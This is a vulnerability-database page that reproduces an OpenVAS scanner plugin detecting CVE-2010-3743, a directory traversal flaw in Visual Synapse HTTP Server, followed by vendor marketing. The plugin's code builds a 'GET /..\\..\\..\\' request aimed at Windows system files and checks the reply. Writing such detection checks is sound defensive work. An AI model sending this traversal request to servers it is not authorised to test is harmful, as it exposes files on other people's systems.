Visual Synapse HTTP Server Directory Traversal Vulnerability (2010) - Active Check
🗓️ 18 Oct 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType
openvas🔗 plugins.openvas.org👁 23 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Visual Synapse HTTP Server v1.0 RC3 Directory Traversal Vulnerability | 8 Oct 201000:00 | – | zdt | |
| EAServer <= 6.3.1 Multiple Vulnerabilities | 3 Jul 201300:00 | – | nessus | |
| CVE-2010-3743 | 8 Oct 201020:00 | – | cve | |
| CVE-2010-3743 | 8 Oct 201020:00 | – | cvelist | |
| EUVD-2010-3722 | 7 Oct 202500:30 | – | euvd | |
| CVE-2010-3743 | 8 Oct 201021:00 | – | nvd | |
| wodWebServer.NET <= 1.3.3 Directory Traversal Vulnerability - Active Check | 28 Mar 201100:00 | – | openvas | |
| Visual Synapse HTTP Server Directory Traversal Vulnerability | 18 Oct 201000:00 | – | openvas | |
| Visual Synapse Directory Traversal | 8 Oct 201000:00 | – | packetstorm | |
| Directory traversal | 8 Oct 201021:00 | – | prion |
10
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/43830 |
| securityfocus | www.securityfocus.com/archive/1/archive/1/514167/100/0/threaded |
| syhunt | www.syhunt.com/ |
| exploit-db | www.exploit-db.com/exploits/15216/ |
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.801526");
script_version("2026-03-17T05:57:28+0000");
script_tag(name:"last_modification", value:"2026-03-17 05:57:28 +0000 (Tue, 17 Mar 2026)");
script_tag(name:"creation_date", value:"2010-10-18 15:37:53 +0200 (Mon, 18 Oct 2010)");
script_cve_id("CVE-2010-3743");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_name("Visual Synapse HTTP Server Directory Traversal Vulnerability (2010) - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2010 Greenbone AG");
script_family("Web Servers");
script_dependencies("find_service.nasl", "httpver.nasl", "os_detection.nasl",
"global_settings.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("Host/runs_windows");
script_exclude_keys("Settings/disable_cgi_scanning");
script_xref(name:"URL", value:"http://www.exploit-db.com/exploits/15216/");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/43830");
script_xref(name:"URL", value:"http://www.syhunt.com/?n=Advisories.Vs-httpd-dirtrav");
script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/archive/1/514167/100/0/threaded");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to launch directory
traversal attack and gain sensitive information about the remote system's directory contents.");
script_tag(name:"affected", value:"Visual Synapse HTTP Server 1.0 RC3, 1.0 RC2, 1.0 RC1 and 0.60
and prior");
script_tag(name:"insight", value:"An input validation error is present in the server which fails
to validate user supplied request URI containing 'dot dot' sequences (/..\).");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"summary", value:"Visual Synapse HTTP Server is prone to a directory traversal vulnerability.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("traversal_func.inc");
port = http_get_port(default:80);
res = http_get_cache(item:"/", port:port);
host = http_host_name(port:port);
if("Visual Synapse HTTP Server" >!< res) exit(0);
traversal_files = traversal_files("windows");
foreach pattern(keys(traversal_files)) {
file = traversal_files[pattern];
file = str_replace( find:"/", string:file, replace:"\\" );
req = string("GET /..\\..\\..\\", file, " HTTP/1.1\r\n",
"Host: ", host, "\r\n\r\n");
res = http_keepalive_send_recv(port:port, data:req);
if(egrep(pattern:pattern, string:res)){
report = http_report_vuln_url(port:port, url:file);
security_message(port:port, data:report);
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Mar 2026 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
EPSS0.02435